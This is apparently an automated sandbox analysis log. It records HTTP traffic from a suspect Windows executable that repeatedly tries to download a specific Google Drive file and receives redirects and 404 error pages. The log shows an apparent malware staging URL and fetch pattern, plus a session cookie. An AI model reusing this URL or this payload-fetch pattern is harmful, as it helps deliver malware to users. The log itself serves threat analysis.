                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-f9cJSS6Tp7joAYh14ll9oQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449894172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:58 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:59 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQRM5utXp5ejsPbRyIKVp5p5DZITeKIORxY-a4aKBmZfiC3lPcvGxNHGufnAU2v8ZAiquIf5rk
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:59 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-WXRINWntd-QKU3LV0NQD1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:13:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 6b 34 76 6d 4c 79 36 37 66 30 41 4a 70 63 52 53 37 37 55 5f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Jk4vmLy67f0AJpcRS77U_Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449968142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:10 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:10 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:10 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-iG3YZpXjbJIsltIpaDJNVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449975172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:11 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:11 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQepwL3X8bSe-R9rdKhZRT_MAfxTRznKm_KaczQJNbkuQGNzP4KwDRR-A6Tlq-77eRQPgNfrqY
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:11 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-CgtWUXN1hCu2CjyUOZkq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:14:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 64 70 50 5a 64 39 6d 53 35 43 5a 57 54 75 39 78 34 54 4b 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HdpPZd9mS5CZWTu9x4TKgw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.450014142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:22 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:22 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:22 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-XMyZeD6KjMV_xpIo01y87g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.450015172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:23 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:23 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQ7u5BAW8jRP-miQYp0-QWtnpzvShLwc52rxHINiWbMhJcQu4lmchCp9wgbQvw0uVra
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:23 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-EW-iSWlwlNDYnMbHYaBvQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:14:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 68 7a 76 42 4c 5a 47 65 63 38 35 6b 34 6b 6b 45 4f 35 62 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YhzvBLZGec85k4kkEO5bMg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.450016142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:34 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:34 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:34 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-YjSB1EXhtJ0Ez_QqIhvAdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.450017172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:14:35 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:14:35 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgRlD7hFYyBuizeg1e5mSmbLEPPNpdWTk3Zg2emGlH_mIk3_0ZZmeekOyUDv3jy0HTRx
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:35 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-hrIgp9iCnLYobQ1jA1kzoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:14:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 4c 4c 2d 6b 57 58 66 59 50 6b 32 6a 43 56 69 37 56 6b 4c 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
